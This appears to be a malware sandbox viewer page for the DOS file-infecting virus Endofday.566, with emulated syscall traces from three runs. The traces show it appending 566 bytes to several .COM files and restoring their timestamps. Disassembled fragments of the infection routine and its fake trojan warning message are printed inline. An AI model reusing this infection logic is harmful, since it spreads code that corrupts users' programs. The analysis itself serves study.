Sample viewer

vx.netlux.org/Virus.DOS.Endofday.566

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:01:20.658387663Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-17T22:01:20.665215049Z	26	PC: 12b95 \| Set disk transfer address
2018-12-17T22:01:20.666415699Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:01:20.667801285Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:01:20.670077564Z	71	PC: 12a8a \| Get current directory
2018-12-17T22:01:20.675269371Z	78	PC: 12ac0 \| Find first file
2018-12-17T22:01:20.681615635Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:01:20.688458114Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:01:20.696566611Z	62	PC: 12af5 \| Close file
2018-12-17T22:01:20.698703674Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:20.716658994Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:01:20.729967111Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:01:20.736725535Z	66	PC: 12b90 \| Move file pointer
2018-12-17T22:01:20.738469555Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-17T22:01:20.742358652Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-17T22:01:20.75341315Z	87	PC: 12b66 \| Get or set file date and time
2018-12-17T22:01:20.755118243Z	62	PC: 12b6a \| Close file
2018-12-17T22:01:20.76349894Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:20.780908085Z	79	PC: 12ac0 \| Find next file
2018-12-17T22:01:20.783887454Z	61	PC: 12b9e \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:01:20.791426427Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:01:20.797950763Z	62	PC: 12af5 \| Close file
2018-12-17T22:01:20.799771868Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:20.815069377Z	61	PC: 12b9e \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:01:20.822878523Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:01:20.825714025Z	66	PC: 12b90 \| Move file pointer
2018-12-17T22:01:20.828441022Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-17T22:01:20.831090361Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-17T22:01:20.839778503Z	87	PC: 12b66 \| Get or set file date and time
2018-12-17T22:01:20.841498767Z	62	PC: 12b6a \| Close file
2018-12-17T22:01:20.849909054Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:20.859958785Z	79	PC: 12ac0 \| Find next file
2018-12-17T22:01:20.862598929Z	61	PC: 12b9e \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:01:20.869502751Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:01:20.879841056Z	62	PC: 12af5 \| Close file
2018-12-17T22:01:20.882066725Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:20.892393349Z	61	PC: 12b9e \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:01:20.898942182Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:01:20.901668888Z	66	PC: 12b90 \| Move file pointer
2018-12-17T22:01:20.90417136Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-17T22:01:20.906987634Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-17T22:01:20.915586621Z	87	PC: 12b66 \| Get or set file date and time
2018-12-17T22:01:20.91819423Z	62	PC: 12b6a \| Close file
2018-12-17T22:01:20.925892182Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:20.935677075Z	79	PC: 12ac0 \| Find next file
2018-12-17T22:01:20.93927212Z	61	PC: 12b9e \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:01:20.946916139Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:01:20.953488954Z	62	PC: 12af5 \| Close file
2018-12-17T22:01:20.956423042Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:20.966889496Z	61	PC: 12b9e \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:01:20.973706076Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:01:20.977016891Z	66	PC: 12b90 \| Move file pointer
2018-12-17T22:01:20.97958784Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-17T22:01:20.982135431Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-17T22:01:20.990400006Z	87	PC: 12b66 \| Get or set file date and time
2018-12-17T22:01:20.992584951Z	62	PC: 12b6a \| Close file
2018-12-17T22:01:21.000145888Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:21.010287727Z	79	PC: 12ac0 \| Find next file
2018-12-17T22:01:21.014083138Z	61	PC: 12b9e \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:01:21.020618976Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:01:21.026998505Z	62	PC: 12af5 \| Close file
2018-12-17T22:01:21.029812017Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:21.03426123Z	61	PC: 12b9e \| Open file (Filename = 'PRINTA~1.COMé')
2018-12-17T22:01:21.038795024Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 2)
2018-12-17T22:01:21.042242546Z	66	PC: 12b90 \| Move file pointer
2018-12-17T22:01:21.043624905Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-17T22:01:21.046072956Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 2)
2018-12-17T22:01:21.055476533Z	87	PC: 12b66 \| Get or set file date and time
2018-12-17T22:01:21.057245191Z	62	PC: 12b6a \| Close file
2018-12-17T22:01:21.059338656Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:21.064677382Z	79	PC: 12ac0 \| Find next file
2018-12-17T22:01:21.067572155Z	61	PC: 12b9e \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:01:21.079623882Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:01:21.087095554Z	62	PC: 12af5 \| Close file
2018-12-17T22:01:21.089543324Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:21.099442492Z	61	PC: 12b9e \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:01:21.107399765Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 2)
2018-12-17T22:01:21.1103056Z	66	PC: 12b90 \| Move file pointer
2018-12-17T22:01:21.111822442Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-17T22:01:21.114329117Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 2)
2018-12-17T22:01:21.123460802Z	87	PC: 12b66 \| Get or set file date and time
2018-12-17T22:01:21.125662173Z	62	PC: 12b6a \| Close file
2018-12-17T22:01:21.131243656Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:21.139976062Z	79	PC: 12ac0 \| Find next file
2018-12-17T22:01:21.141881425Z	61	PC: 12b9e \| Open file (Filename = 'PAH.COM')
2018-12-17T22:01:21.146771015Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:01:21.153426322Z	62	PC: 12af5 \| Close file
2018-12-17T22:01:21.155313068Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:21.162327928Z	61	PC: 12b9e \| Open file (Filename = 'PAH.COM')
2018-12-17T22:01:21.167146869Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 2)
2018-12-17T22:01:21.169146281Z	66	PC: 12b90 \| Move file pointer
2018-12-17T22:01:21.170715191Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-17T22:01:21.173343759Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 2)
2018-12-17T22:01:21.178976359Z	87	PC: 12b66 \| Get or set file date and time
2018-12-17T22:01:21.180354963Z	62	PC: 12b6a \| Close file
2018-12-17T22:01:21.186110849Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-17T22:01:21.192934381Z	79	PC: 12ac0 \| Find next file
2018-12-17T22:01:21.194771955Z	61	PC: 12b9e \| Open file (Filename = 'TEST.COM')
2018-12-17T22:01:21.203299851Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:01:21.207637798Z	62	PC: 12af5 \| Close file
2018-12-17T22:01:21.209061562Z	79	PC: 12ac0 \| Find next file
2018-12-17T22:01:21.211936851Z	59	PC: 12a99 \| Change current directory
2018-12-17T22:01:21.214733894Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-17T22:01:21.216362597Z	9	PC: 12b87 \| Display string (String= 'Your system might be infected by unknown trojan!Please check shut down your system now!*.com..º ´ ¶¾;¹¤âý–;ÿÒÃS–'ÿÒ[´@¹6–Í!S–'ÿÒ[Ã.Š¦:¶¹.0')
2018-12-17T22:01:21.220967143Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:01:21.222000701Z	59	PC: 12ab2 \| Change current directory
2018-12-17T22:01:21.223488901Z	26	PC: 12b95 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:08.08774141Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:08.09354635Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:08.094743643Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:08.096000453Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:08.102112515Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:08.105973248Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:08.112411619Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:08.120951145Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:08.133279428Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:08.134996814Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:08.15272018Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.160099647Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:08.163121548Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:08.165157475Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:08.168254002Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:08.176279685Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:08.178366823Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:08.190358908Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.200149253Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.202749691Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.210334538Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.216693279Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.218570876Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.229414909Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.236033093Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.238906024Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.240997421Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.243738651Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.252924409Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.255565292Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.263858798Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.273846117Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.276887281Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.282376491Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.287024586Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.288262756Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.296331909Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.307537156Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.314432305Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.316548996Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.319185413Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.327951866Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.330333577Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.339339333Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.349652393Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.353375392Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.360855611Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.367207295Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.369638527Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.378829934Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.383519105Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.386324378Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.38752606Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.389515423Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.397268902Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.39888267Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.4048178Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.414339582Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.417416365Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.422959015Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.428467718Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.430625151Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.438551691Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.44336005Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.44540029Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.446609584Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.449370964Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.465399936Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.467110339Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.469031698Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.473455906Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.480573425Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.487009874Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.493182813Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.495180461Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.505733287Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.512049846Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.514608978Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.516839187Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.519719771Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.528408057Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.530034604Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.537788571Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.547532757Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.550336249Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.556923771Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.562904979Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.564809676Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.773607771Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.780770193Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.788500211Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.790701717Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.793349111Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.178142233Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.180188654Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.216395045Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.229152975Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.232806737Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.240603803Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.247368023Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.250906747Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.253620425Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:09.258477682Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:09.261929113Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.263325827Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:09.265275083Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:08.437504936Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:08.444172888Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:08.445927074Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:08.447830429Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:08.449464948Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:08.453204777Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:08.465265185Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:08.472375204Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:08.479760853Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:08.481794272Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:08.496826925Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.503454729Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:08.505515359Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:08.50673614Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:08.509166488Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:08.526270502Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:08.528289863Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:08.537733865Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.549549551Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.552801446Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.560232229Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.56787109Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.569859535Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.580927997Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.589427987Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.59255149Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.594092252Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.598152029Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.608099456Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.610922159Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.620431771Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.631977882Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.635146829Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.64356392Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.651282679Z	62	PC: 12af5 \| Close file (See above)
